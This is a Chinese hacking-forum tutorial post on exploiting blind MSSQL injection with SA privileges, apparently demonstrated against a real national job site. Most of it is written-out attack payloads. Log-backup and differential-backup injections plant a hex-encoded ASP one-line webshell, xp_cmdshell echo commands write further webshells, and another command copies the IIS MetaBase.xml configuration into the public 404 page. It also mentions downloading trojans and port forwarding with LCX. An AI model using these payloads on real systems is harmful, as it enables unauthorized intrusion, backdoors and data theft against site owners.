中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————% m" ^5 q  \, }! F/ F4 j
* T0 G! U" u! e3 S: K& {
: F+ P; j. x( T6 b  @9 I
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
) ~/ k$ r1 x! C8 A6 K" Z: C5 o  A5 v2 R/ r
                                                                 
" @( h* A- O9 ^1 v! [' @1 k                                                                 
' V: Z9 r7 M; f% p# a                                                                  论坛: http://www.90team.net/
! W* @% w( {5 C" Y: g' h3 C& l9 [1 O% ^7 C! ]. ~! a

: F% x+ C6 \7 s" a  [8 v5 D2 U$ P' r! }* ~% h
友情检测国家人才网
1 z6 X! P7 q& f/ h4 |% r
# @7 F/ g8 o' E; n3 M. ~& r, T9 z6 J. E
内容:MSSQL注入SA权限不显错模式下的入侵
1 a) t0 F* Z3 ]) V  D# k. M8 u
9 B# g9 t: V- C; O
- }$ N; L: i& v3 t9 L$ z一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
2 w, n; ~. [0 P2 ]8 G* B. _; ?. s( o; e7 X0 Z7 y# E% Y
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
% V0 p" G. G7 ^: D9 |; i
. l) @  x4 s' x& ~7 l& i3 @+ ~  q! Q8 H+ c
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
5 r  P" S( b: U% e/ a6 ~- W  T! }0 Y8 l
思路:
: h; s# z' @4 Y) I! B* F  J3 V' y; L; u, \- F8 |! g$ `/ ?
首先:
9 g; t7 t7 W. F1 j& {# T* m1 S4 S- N0 H
: L1 J; d2 V( s; j1 m3 |) S通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。* }. A3 ]; A$ @2 L2 g& O
4 R. G9 |0 ]3 G# U: _" c
1.日志备份获得Webshell
9 u3 f) S+ n2 _7 N0 O; g6 S8 f: O( N3 y- S5 i) y
2.数据库差异备份获得Webshell, u9 v2 a/ b2 q8 T7 `
) |  \" v# s0 d. A) {1 `8 i
4.直接下载免杀远控木马。
9 R% K  R2 p" s" x( @0 O
# o' E5 p' Q- |5.直接下载LCX将服务器端口转发出来/ s: U  {& `3 X5 Y1 o( W9 S

/ J4 `+ t( E9 ]% N4 {; E( G6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。- E$ \; U$ K0 ?5 @6 T' E3 J
9 R: }# z8 i9 b: _
7 A3 [# D9 G( D5 v+ q

" e1 x: Q9 W7 ]: U3 B( D5 |! S在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 6 u- L0 `$ D5 X1 i$ [

/ z( X" K, a/ N: P7 f( o* h我直接演示后面一个方法
. G$ S, @; o! Z6 h: i5 j7 v
" v) o( p& ~1 Y2 @' i/ Y' g* |  Z3 v, C; x! h1 X3 u) `
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL   W8 i4 y% @8 X& O) C' @8 V
0 l5 J" N2 Q, S: a

- O+ Z# n. k% G7 J' y3 L9 o
; Y" B* b3 P' V" a: b$ \* {
, t* Z9 S- r' G- Q( e7 L2 \$ Z◆日志备份:7 l+ w! b- }' a: H

  M" |+ O' v- y+ Z1 T  N- m( B  m5 z7 m8 O4 J% [
1. 进行初始备份: C& |5 h. Q. G8 N$ y
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--' \- u# u) }5 |6 `) j* t4 ~* f0 i( r

6 ~/ Z1 B6 E" b2. 插入数据
9 g4 h  A6 l2 L. B" m. |8 l; s;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--, ^, _9 h; U7 G' j3 M9 g

3 y% h9 x7 C0 J0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
2 g5 H1 h$ R9 T/ j5 v3 I: f! |$ T  E3 z" d  
$ r6 X" e3 y6 ~# h) X& V* C" Q- ~  Q! }% T3. 备份并获得文件,删除临时表
$ \$ ~: v$ E2 W( F# z;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  l: F, B  f) s. x  i9 s- x. `0 x) k& C# ]" B  K! a  i

# {, r  ?- k& W9 t' n- a& C& z3 {2 v* n- ?5 t% \' u
◆数据库差异备份  t: @/ o; a9 H+ j1 X
' z# s# O, r' ~8 X6 s+ K
(1. 进行差异备份准备工作
% W; G; a. k1 z: x5 X9 m. m/ t
& Z4 x1 v# y- r! a! G1 U;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--5 t" W$ Z; x4 m. o3 @- o
5 e' o" h2 k+ k9 L4 |" Y: ~" G
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码8 t+ b6 x* j8 @0 g+ x* e0 v$ H
3 D' C" {4 Y4 L* c. o( ~

% u, ~% ~" k# C1 }(2. 将数据写入到数据库
6 M" [- I* a* ?: Y2 P;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
9 S1 Q7 p  Y2 L& v# |# l) W% Y4 T6 A. w+ A9 V8 C: I
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>6 n6 W* |8 t* d! C
1 A7 E# Q+ X$ L
3. 备份数据库并清理临时文件. ~6 a3 U9 @3 d. h4 ?$ P! M$ P4 J
1 [0 D$ p3 u9 y6 a
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
- e/ I0 D4 G9 W* D4 x- q. i" w0 ^- }4 N! }5 H6 }) U0 w
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
- K6 O* b+ z( T* Q$ Y
' @0 d* Y4 k( r, @  b7 d0 }2 t4 O) M
8 ^$ H$ }& n5 q6 U: R
用^转义字符来写ASP(一句话木马)文件的方法:   
! Y# |3 }+ p6 @9 y2 y2 S
, z; ^+ n1 |4 x& A( R1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--" J9 e0 v6 k) h" g7 ~2 X2 o, Y/ I
7 U0 I- e! F4 E9 `- {$ Q
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 8 ?0 t+ r% }9 t1 h9 i3 b) f

8 k+ [/ R. q& K6 o/ a& g6 P+ C读取IIS配置信息获取web路径
' [5 P! H1 q5 d# a- F* ~$ |* g& \& a7 S- ^' B- d! y$ h; W- J
     
9 g) M8 i8 k: \& d+ S. P% G     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--: c! g+ p' U5 B1 P  \  p
9 {+ u8 A2 A& o5 m' w
执行命令' v' J9 H2 r. e# _9 Y% ?
     
3 w, d2 d% q- W     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
6 ^1 v7 E+ n- t  U8 s) w+ \  {' J3 X7 j# j1 e! \9 u( R

, Z4 n! x, H; N" r- q
  h+ c$ T/ R+ u6 z( @) U
0 v  ^& ^' G( |/ }1 S2 q# g  G7 ]5 z( m- a' e( n* t2 a" P

% x7 h2 }& S$ H/ I
4 I: v1 I3 L/ |* r9 D. o7 f4 x+ b( r+ W( }. {
( U0 w/ O4 r5 l0 ~$ w* z6 R
1 g* {% g" N& s8 D" j+ n3 X3 G

" N8 K5 ^! v( c. d) _, K5 Z$ x
# p: @- [3 ~4 C7 M; [5 _# B+ |& J: k; e. v

0 N- f* O' s; o, t
1 V; \+ J+ F) h
% p7 G1 ]4 ?* T$ u4 b4 {+ L7 ]& {" b3 n9 p) W1 b: P5 F, ]8 v

: }) ~. C" o# f3 S
1 x# _- Q  N, e2 w5 n( X; `: Z: F
8 y" V7 l1 q' q( p/ u) s! A: G6 b7 a/ K2 M
4 m- a) i) e9 L/ U' ~# U2 z

3 F& ~1 b  W% n2 {7 C- Y2 \* w% n% I# u, E
$ t" f8 Y+ t& h3 ], h3 T( u7 W; S) n
( Q5 q' b% N8 T8 K8 R

# [. h/ R( W% ]0 U! @/ u' q$ J5 \% f! D5 N- E% j  H! u: h

3 Q1 `/ `2 H  a! J' t7 a" \, T; i0 Q
2 z2 A/ ?; [. B  n- k/ u6 R' L
0 K; [" h# l5 V% D& ~! v5 r

4 Y6 [# e( F- Z2 z
% b* [6 d! b( W9 g0 R& b/ h. e+ ?) U" w0 Y( N
) _/ Y" G4 A) H9 \  h
2 ?: L4 d+ d+ }) S  R
! K! M) w2 _, k, T
+ ~* g  j7 q" h: ?. N/ v; S. ~6 F! ]
/ t# D+ @8 e% C

" H- `: E5 ^2 g( K! I9 G3 s. b* H* l9 ]# |
8 j: o. D  f" N* ~4 @7 E
0 g1 n, @, S% a/ a9 b) s
7 y, A3 L: l. _& W9 A
5 g8 m) U: {) r, O# E

3 X- {1 `- f/ F) I* S4 K) W1 k2 S) Z4 p* S. Y* Y




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2